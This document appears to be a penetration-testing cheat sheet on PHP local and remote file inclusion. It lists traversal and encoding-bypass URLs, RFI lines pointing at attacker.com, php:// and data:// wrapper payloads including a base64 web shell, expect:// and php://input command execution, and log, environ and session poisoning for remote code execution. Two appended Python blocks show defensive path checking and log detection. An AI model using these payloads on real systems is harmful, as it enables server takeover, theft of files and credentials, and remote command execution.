File Inclusion
Remote File Inclusion (RFI): the file is loaded from a remote server (best case: you can write the code and the server will execute it). In PHP this is disabled by default (allow_url_include).
Local File Inclusion (LFI): the server loads a local file.
The vulnerability occurs when the user can control, in some way, the file that the server is going to load.
Vulnerable PHP functions: require, require_once, include, include_once
Blind - Interesting - LFI2RCE files
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
Good wordlists for fuzzing
Basic LFI and Bypass Techniques
http://example.com/index.php?page=../../../etc/passwd
#null byte
http://example.com/index.php?page=../../../etc/passwd%00
#encoding
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
#filter bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=/var/www/../../etc/passwd #Maintain the initial path
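As an added example (not from the original page), the Python below models why the `....//` payload above defeats a filter that strips `../` in a single pass, next to a resolution routine that decodes once, refuses double-encoded and null-byte input, and checks containment on the canonical path instead of on the attacker-controlled string. The document root `/var/www/html/pages` and the function names are assumptions.

```python
import os
from urllib.parse import unquote

# Hypothetical document root for included pages (an assumption, not from the page).
BASE_DIR = "/var/www/html/pages"

def naive_sanitize(value: str) -> str:
    """The broken filter the '....//' payload targets: a single pass of stripping '../'."""
    return value.replace("../", "")

def naive_resolve(value: str, base_dir: str = BASE_DIR) -> str:
    """What include() sees after the naive filter: the stripped value is joined to the root."""
    return os.path.normpath(os.path.join(base_dir, naive_sanitize(value)))

def safe_resolve(value: str, base_dir: str = BASE_DIR):
    """Defensive resolution: decode once, refuse leftovers, canonicalise, enforce containment.
    Returns the absolute path to include, or None when the request must be rejected."""
    decoded = unquote(value)
    # Double-encoded input (%252e) still holds '%' after one decode; a null byte (%00)
    # truncated paths in old PHP builds. Refuse both instead of trying to clean them.
    if "%" in decoded or "\x00" in decoded:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses every '..' (and symlinks), so containment is checked on the
    # final path. An absolute value such as /etc/passwd makes os.path.join discard
    # base entirely, and the containment check below rejects that case too.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```

Note that `safe_resolve` never strips anything, so `....//` stays a harmless (nonexistent) file name under the root rather than collapsing into `../`.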
Top 25 parameters
Here is a list of the top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link):
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Basic RFI
http://example.com/index.php?page=http://attacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
LFI / RFI using PHP wrappers & protocols
php://filter
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.strip_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");
# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
## Output: =C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");
# Compression Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); # To decompress the data locally
data://
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
expect://
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
input://
# Specify your payload in the POST parameters
http://example.com/index.php?page=php://input
POST DATA: <?php system('id'); ?>
More protocols
file:// — Accessing local filesystem
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
glob:// — Find pathnames matching pattern
LFI2RCE
Log injection
If the Apache or Nginx server is vulnerable to LFI and you can reach the log file, place a PHP shell such as <?php system($_GET['c']); ?> in the User-Agent or in a GET parameter, then include the log file. We do this in the HTB box Vessel.
Default log paths:
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
Via /proc/self/environ
As with a log file, send the payload in the User-Agent; it will be reflected inside the /proc/self/environ file.
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
Via PHP sessions
Check whether the website uses PHP sessions (PHPSESSID):
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
Sessions are stored in /var/lib/php5/sess_[PHPSESSID] by default:
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27:
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
Set the cookie to <?php system('cat /etc/passwd');?>
or in POST data:
login=1&user=<?php system("cat /etc/passwd"); ?>&pass=password&lang=en_us.php
Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8n
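As an added example (not from the original page), a small Python detector for the wrapper section above and for the log, /proc/self/environ and session poisoning techniques: it percent-decodes each request URI twice (so double encoding and overlong UTF-8 become visible), then flags traversal, PHP stream wrappers, sensitive target paths, and PHP tags planted in the User-Agent. The log lines are constructed, and the regex assumes the default Apache/Nginx combined log format.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample in Apache/Nginx combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2411 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 6120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:51 +0000] "GET /index.php?page=....//....//....//proc/self/environ HTTP/1.1" 200 0 "-" "<?php phpinfo(); ?>"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /nav.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 88021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
WRAPPER_RE = re.compile(rb"(?i)\b(php|data|expect|file|glob|ftp|input)://|\bdata:[a-z]+/")
TARGET_RE = re.compile(rb"/proc/self/environ|/sess_|/etc/passwd|access\.log|error\.log|error_log")
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)

def classify_request(uri: str, user_agent: str) -> list:
    """Return the LFI/RFI indicators found in one request (empty list if clean)."""
    once = unquote_to_bytes(uri)
    twice = unquote_to_bytes(once)  # second pass on bytes exposes %252f and %c0%af
    reasons = []
    if b"%" in once and twice != once:
        reasons.append("double-encoding")
    if b"\x00" in twice:
        reasons.append("null-byte")
    if b"\xc0\xaf" in twice or b"\xc0\xae" in twice:
        reasons.append("overlong-utf8")
    if b"../" in twice.replace(b"\\", b"/"):  # also catches '....//', '..\/' and '%5C../'
        reasons.append("traversal")
    if WRAPPER_RE.search(twice):
        reasons.append("php-wrapper")
    if TARGET_RE.search(twice):
        reasons.append("sensitive-target")
    if PHP_TAG_RE.search(user_agent):
        reasons.append("php-tag-in-user-agent")
    return reasons

def scan_access_log(text: str) -> list:
    """Return (client ip, raw uri, indicators) for every line that triggers at least one."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reasons = classify_request(m["uri"], m["ua"])
            if reasons:
                hits.append((m["ip"], m["uri"], reasons))
    return hits
```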